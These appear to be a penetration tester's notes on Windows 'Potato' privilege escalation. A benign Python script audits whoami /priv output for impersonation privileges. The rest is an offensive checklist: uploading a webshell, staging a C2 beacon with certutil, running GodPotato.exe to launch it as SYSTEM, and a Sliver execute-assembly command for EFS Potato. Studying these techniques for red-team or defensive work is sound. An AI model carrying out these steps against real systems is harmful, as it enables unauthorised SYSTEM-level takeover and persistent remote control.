Windows Potatoes
1.0 Prerequisites
The following privileges are required (check with whoami /priv):
- SeImpersonatePrivilege
- SeAssignPrimaryTokenPrivilege
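To audit which accounts meet this prerequisite, the following added example (not part of the original notes) parses whoami /priv output and reports the state of the two privileges listed above. It assumes English-locale output; the sample text and function names are constructed for illustration.

```python
import re

# The two privileges listed as prerequisites above.
WATCHED = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Constructed sample: English-locale `whoami /priv` rows of a service account.
SERVICE_SAMPLE = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
"""

# Constructed sample: a standard interactive user.
USER_SAMPLE = """\
Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# One table row: privilege name, free-text description, state column.
ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")

def parse_privileges(text):
    """Map each privilege name in the output to its State column."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def audit(text):
    """State of each watched privilege, or 'Absent' if not in the token."""
    privs = parse_privileges(text)
    return {name: privs.get(name, "Absent") for name in WATCHED}

def held(text):
    """Watched privileges present in the token. 'Disabled' still counts:
    the process can enable a privilege it holds, so only absence is safe."""
    return sorted(n for n, s in audit(text).items() if s != "Absent")

if __name__ == "__main__":
    for label, sample in (("service", SERVICE_SAMPLE), ("user", USER_SAMPLE)):
        print(label, audit(sample), "held:", held(sample))
```

Run it against output collected from web application and service accounts; any account where held() is non-empty meets the prerequisite and is a candidate for privilege review.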
2.0 GodPotato
- upload a webshell
- transfer beacon with e.g. BIN - certutil
- execute beacon with webshell
- new webshell in a new tab
- transfer GodPotato.exe with certutil
- Run:
GodPotato.exe -cmd "Beacon.exe"
3.0 EFS Potato (Sliver)
sliver (phant0mas) > execute-assembly /home/kali/tools/privesc/efs.exe "C:\windows\tasks\phant0mas.exe"